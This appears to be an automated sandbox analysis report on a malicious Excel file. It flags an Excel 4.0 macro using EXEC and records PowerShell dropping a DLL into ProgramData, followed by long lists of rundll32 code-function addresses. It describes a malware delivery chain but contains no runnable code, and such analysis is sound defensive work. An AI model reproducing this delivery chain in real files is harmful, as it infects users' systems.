                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\QWER.dllJump to dropped file
                            Found Excel 4.0 Macro with suspicious formulas
                            Source: 80_513972285.xlsInitial sample: EXEC
                            Source: 80_513972285.xlsInitial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100360079_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100410509_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003130F9_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100323E29_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100304609_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100415929_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003E59F9_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003960C9_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100317E29_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10040B0E9_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10031BB69_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10041C569_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10036CB59_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001CD169_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10042D219_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10031FC29_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003497009_2_00349700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00355CF99_2_00355CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003550409_2_00355040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035109E9_2_0035109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003460839_2_00346083
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003470ED9_2_003470ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034911A9_2_0034911A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034F1549_2_0034F154
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035A1569_2_0035A156
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003541A79_2_003541A7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003591869_2_00359186
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035026B9_2_0035026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034E2439_2_0034E243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035129C9_2_0035129C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034C3099_2_0034C309
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035B3919_2_0035B391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035C38F9_2_0035C38F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035D3C89_2_0035D3C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035542E9_2_0035542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035A4299_2_0035A429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034B41A9_2_0034B41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0036146E9_2_0036146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003504B89_2_003504B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035E4989_2_0035E498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003564F19_2_003564F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003444FA9_2_003444FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003604DE9_2_003604DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003574DD9_2_003574DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003535129_2_00353512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034F58F9_2_0034F58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003545CD9_2_003545CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035363D9_2_0035363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035561F9_2_0035561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003636729_2_00363672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003486509_2_00348650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034472E9_2_0034472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034777B9_2_0034777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003527539_2_00352753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003518319_2_00351831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003428309_2_00342830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034B8219_2_0034B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003608679_2_00360867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003568649_2_00356864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034E86A9_2_0034E86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034C8509_2_0034C850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003488F49_2_003488F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035D8D79_2_0035D8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003468DE9_2_003468DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034F93D9_2_0034F93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003419509_2_00341950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003509469_2_00350946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034194C9_2_0034194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035C9A99_2_0035C9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003599AA9_2_003599AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003619939_2_00361993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00346A1F9_2_00346A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00349A7D9_2_00349A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034CA439_2_0034CA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034AB669_2_0034AB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00361B549_2_00361B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00354B569_2_00354B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034BB4B9_2_0034BB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00347B829_2_00347B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00352BF69_2_00352BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035EBFF9_2_0035EBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00357BCA9_2_00357BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00346C299_2_00346C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034EC9B9_2_0034EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035CC899_2_0035CC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035ACD39_2_0035ACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00350D339_2_00350D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034BD0F9_2_0034BD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00358D719_2_00358D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00360D5B9_2_00360D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00353D419_2_00353D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00348D959_2_00348D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034FD8C9_2_0034FD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035EE949_2_0035EE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034AE9A9_2_0034AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035BE8C9_2_0035BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00346ED69_2_00346ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035FF319_2_0035FF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00343FB89_2_00343FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00342FA19_2_00342FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00341F9B9_2_00341F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034CFCE9_2_0034CFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004374DD10_2_004374DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004270ED10_2_004270ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00435CF910_2_00435CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043BE8C10_2_0043BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043EE9410_2_0043EE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042EC9B10_2_0042EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043E49810_2_0043E498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00441B5410_2_00441B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042970010_2_00429700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043351210_2_00433512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042F93D10_2_0042F93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043B39110_2_0043B391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00428D9510_2_00428D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042CA4310_2_0042CA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042E24310_2_0042E243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043504010_2_00435040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042C85010_2_0042C850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042865010_2_00428650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0044086710_2_00440867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043686410_2_00436864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042E86A10_2_0042E86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043026B10_2_0043026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0044146E10_2_0044146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0044367210_2_00443672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00429A7D10_2_00429A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042B41A10_2_0042B41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043561F10_2_0043561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00426A1F10_2_00426A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042B82110_2_0042B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043A42910_2_0043A429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00426C2910_2_00426C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043542E10_2_0043542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043183110_2_00431831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042283010_2_00422830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043363D10_2_0043363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043ACD310_2_0043ACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00426ED610_2_00426ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043D8D710_2_0043D8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004404DE10_2_004404DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004268DE10_2_004268DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004364F110_2_004364F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004288F410_2_004288F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004244FA10_2_004244FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042608310_2_00426083
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043CC8910_2_0043CC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042AE9A10_2_0042AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043109E10_2_0043109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043129C10_2_0043129C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004304B810_2_004304B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00433D4110_2_00433D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043094610_2_00430946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042BB4B10_2_0042BB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042194C10_2_0042194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043275310_2_00432753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042195010_2_00421950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043A15610_2_0043A156
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00434B5610_2_00434B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042F15410_2_0042F154
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00440D5B10_2_00440D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042AB6610_2_0042AB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00438D7110_2_00438D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042777B10_2_0042777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042C30910_2_0042C309
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042BD0F10_2_0042BD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042911A10_2_0042911A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042472E10_2_0042472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00430D3310_2_00430D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043FF3110_2_0043FF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00437BCA10_2_00437BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043D3C810_2_0043D3C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042CFCE10_2_0042CFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004345CD10_2_004345CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00432BF610_2_00432BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043EBFF10_2_0043EBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00427B8210_2_00427B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043918610_2_00439186
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043C38F10_2_0043C38F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042F58F10_2_0042F58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042FD8C10_2_0042FD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0044199310_2_00441993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00421F9B10_2_00421F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00422FA110_2_00422FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004341A710_2_004341A7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004399AA10_2_004399AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043C9A910_2_0043C9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00423FB810_2_00423FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003600711_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004105011_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003130F11_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100323E211_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003046011_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004159211_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003E59F11_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003960C11_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100317E211_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10040B0E11_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031BB611_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10041C5611_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10036CB511_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001CD1611_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10042D2111_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031FC211_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047970011_2_00479700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00485CF911_2_00485CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048504011_2_00485040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004770ED11_2_004770ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047608311_2_00476083
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048109E11_2_0048109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047F15411_2_0047F154
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048A15611_2_0048A156
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047911A11_2_0047911A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048918611_2_00489186
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004841A711_2_004841A7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047E24311_2_0047E243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048026B11_2_0048026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048129C11_2_0048129C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047C30911_2_0047C309
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048D3C811_2_0048D3C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048C38F11_2_0048C38F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048B39111_2_0048B391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0049146E11_2_0049146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047B41A11_2_0047B41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048A42911_2_0048A429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048542E11_2_0048542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004874DD11_2_004874DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004904DE11_2_004904DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004864F111_2_004864F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004744FA11_2_004744FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048E49811_2_0048E498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004804B811_2_004804B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048351211_2_00483512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004845CD11_2_004845CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047F58F11_2_0047F58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047865011_2_00478650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0049367211_2_00493672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048561F11_2_0048561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048363D11_2_0048363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048275311_2_00482753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047777B11_2_0047777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047472E11_2_0047472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047C85011_2_0047C850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048686411_2_00486864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047E86A11_2_0047E86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0049086711_2_00490867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047B82111_2_0047B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047283011_2_00472830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048183111_2_00481831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004768DE11_2_004768DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048D8D711_2_0048D8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004788F411_2_004788F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047194C11_2_0047194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048094611_2_00480946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047195011_2_00471950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047F93D11_2_0047F93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0049199311_2_00491993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048C9A911_2_0048C9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004899AA11_2_004899AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047CA4311_2_0047CA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00479A7D11_2_00479A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00476A1F11_2_00476A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047BB4B11_2_0047BB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00491B5411_2_00491B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00484B5611_2_00484B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047AB6611_2_0047AB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00487BCA11_2_00487BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048EBFF11_2_0048EBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00482BF611_2_00482BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00477B8211_2_00477B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00476C2911_2_00476C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048ACD311_2_0048ACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048CC8911_2_0048CC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047EC9B11_2_0047EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00483D4111_2_00483D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00490D5B11_2_00490D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00488D7111_2_00488D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047BD0F11_2_0047BD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00480D3311_2_00480D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047FD8C11_2_0047FD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00478D9511_2_00478D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00476ED611_2_00476ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048BE8C11_2_0048BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048EE9411_2_0048EE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047AE9A11_2_0047AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048FF3111_2_0048FF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047CFCE11_2_0047CFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00471F9B11_2_00471F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00472FA111_2_00472FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00473FB811_2_00473FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002704B812_2_002704B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027BE8C12_2_0027BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027EE9412_2_0027EE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026EC9B12_2_0026EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027E49812_2_0027E498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002670ED12_2_002670ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00275CF912_2_00275CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002774DD12_2_002774DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026F93D12_2_0026F93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026970012_2_00269700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027351212_2_00273512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00281B5412_2_00281B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00268D9512_2_00268D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027B39112_2_0027B391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026B82112_2_0026B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027542E12_2_0027542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027A42912_2_0027A429
